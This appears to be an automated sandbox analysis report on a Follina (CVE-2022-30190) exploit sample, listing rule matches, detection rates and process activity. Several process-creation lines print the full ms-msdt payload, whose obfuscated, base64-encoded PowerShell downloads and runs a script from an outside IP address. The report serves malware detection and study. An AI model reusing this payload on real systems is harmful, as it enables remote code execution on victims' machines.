HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

System Summary

Source: exploit.htm, type: SAMPLE

Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784

Source: exploit.htm	Virustotal: Detection: 48%
Source: exploit.htm	ReversingLabs: Detection: 34%

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\aba93dee-0022-4bed-a4a7-ef5b2422db2c.tmp

Jump to behavior

Source: C:\Windows\System32\msdt.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: classification engine

Classification label: mal56.expl.winHTM@34/144@2/5

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\exploit.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,8817576632798332295,11309557218789248613,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1940 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22%20IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Inv%60o%60ke-Ex%60pr%60e%60s%60sion($(Inv%60o%60ke-Ex%60pr%60e%60s%60sion('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIABjAHMAZQByAG8AYQBkACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwBjAHMAZQByAG8AYQBkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0ACcAKwAnAHQAcAA6AC8ALwAxADEANwAuADQAOAAuADEANAA2AC4AMgA0ADYAOgA4ADAAMAAzAC8AYQAnACkA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,8817576632798332295,11309557218789248613,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1940 /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22%20IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Inv%60o%60ke-Ex%60pr%60e%60s%60sion($(Inv%60o%60ke-Ex%60pr%60e%60s%60sion('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIABjAHMAZQByAG8AYQBkACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwBjAHMAZQByAG8AYQBkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0ACcAKwAnAHQAcAA6AC8ALwAxADEANwAuADQAOAAuADEANAA2AC4AMgA0ADYAOgA4ADAAMAAzAC8AYQAnACkA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62AADA00-9CC.pma

Jump to behavior

Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next

Source: C:\Windows\System32\msdt.exe

File opened: C:\Windows\system32\MSFTEDIT.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic			Jump to behavior

Persistence and Installation Behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\2508_525662352\LICENSE.txt

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22%20IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Inv%60o%60ke-Ex%60pr%60e%60s%60sion($(Inv%60o%60ke-Ex%60pr%60e%60s%60sion('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIABjAHMAZQByAG8AYQBkACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwBjAHMAZQByAG8AYQBkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0ACcAKwAnAHQAcAA6AC8ALwAxADEANwAuADQAOAAuADEANAA2AC4AMgA0ADYAOgA4ADAAMAAzAC8AYQAnACkA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22%20IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Inv%60o%60ke-Ex%60pr%60e%60s%60sion($(Inv%60o%60ke-Ex%60pr%60e%60s%60sion('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'cwBlAHQALQBhAGwAaQBhAHMAIAAtAG4AYQBtAGUAIABjAHMAZQByAG8AYQBkACAALQB2AGEAbAB1AGUAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AOwBjAHMAZQByAG8AYQBkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0ACcAKwAnAHQAcAA6AC8ALwAxADEANwAuADQAOAAuADEANAA2AC4AMgA0ADYAOgA4ADAAMAAzAC8AYQAnACkA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22			Jump to behavior